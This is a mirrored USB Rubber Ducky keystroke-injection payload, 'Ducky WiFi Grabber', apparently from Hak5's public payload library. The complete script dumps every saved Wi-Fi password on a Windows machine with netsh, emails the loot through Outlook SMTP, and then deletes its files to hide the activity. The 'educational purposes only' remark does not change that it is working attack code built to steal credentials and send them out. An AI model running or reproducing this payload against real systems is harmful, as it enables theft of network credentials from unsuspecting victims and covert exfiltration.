Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/DUCKY-WIFI_GRABER/payload.txt
2968 views
1
REM Title:         Ducky WiFi Grabber

2
REM Description:   Steals wifi passwords and sends them to your outlook email

3
REM Author:        Zero_Sploit

4
REM Props:         Hak5 Team

5
REM Version:       1.0

6
REM Category:      Exfiltration

7
REM Target:        Windows 10 (CMD + Powershell)

8
REM Attackmodes:   HID

9
REM Some editing on your part is needed such as outlook email & password

10
REM This script is for educational purposes only please do not use this for malicious purposes

11
REM Open Cmd

12
DELAY 1000

13
WINDOWS r

14
DELAY 500

15
STRING cmd

16
ENTER

17
DELAY 200

18
REM Get all SSID

19
STRING cd %USERPROFILE% & netsh wlan show profiles | findstr "All" > a.txt

20
ENTER

21
REM Create a filter.bat to get all the profile names

22
STRING echo SETLOCAL EnableDelayedExpansion^

23
ENTER

24
ENTER

25
STRING for /f "tokens=5*" %%i in (a.txt) do (^

26
ENTER

27
ENTER

28
STRING set val=%%i %%j^

29
ENTER

30
ENTER

31
STRING if "!val:~-1!" == " " set val=!val:~0,-1!^

32
ENTER

33
ENTER

34
STRING echo !val!^>^>b.txt) > filter.bat

35
ENTER

36
REM Run filter.bat and save all profile names in b.txt

37
STRING filter.bat

38
DELAY 300

39
ENTER

40
REM --> Save all the LOOT in Log.txt and delete the other files

41
STRING (for /f "tokens=*" %i in (b.txt) do @echo     SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:"Key Content" & echo.) > Log.txt

42
ENTER

43
DELAY 1000

44
STRING exit

45
DELAY 500

46
ENTER

47
DELAY 1000

48
REM Mail Log.txt

49
WINDOWS r

50
DELAY 500

51
STRING powershell

52
ENTER

53
DELAY 1000

54
STRING del .\a.txt 

55
ENTER

56
STRING del .\b.txt 

57
ENTER

58
STRING del .\filter.bat

59
ENTER

60
REM Email The Log.txt file

61
STRING $SMTPServer = 'smtp-mail.outlook.com'

62
ENTER

63
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)

64
ENTER

65
STRING $SMTPInfo.EnableSSL = $true

66
ENTER

67
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('YOUR EMAIL HERE', 'YOUR EMAIL PASSWORD HERE')

68
ENTER

69
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage

70
ENTER

71
STRING $ReportEmail.From = 'YOUR EMAIL HERE'

72
ENTER

73
STRING $ReportEmail.To.Add('YOUR EAMIL HERE')

74
ENTER

75
STRING $ReportEmail.Subject = 'WiFi key grabber'

76
ENTER

77
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)

78
ENTER

79
STRING $SMTPInfo.Send($ReportEmail)

80
ENTER

81
REM Delete Log.txt and exit

82
DELAY 3000

83
STRINGLN del Log.txt

84
DELAY 500

85
STRINGLN exit

86
ENTER

87


88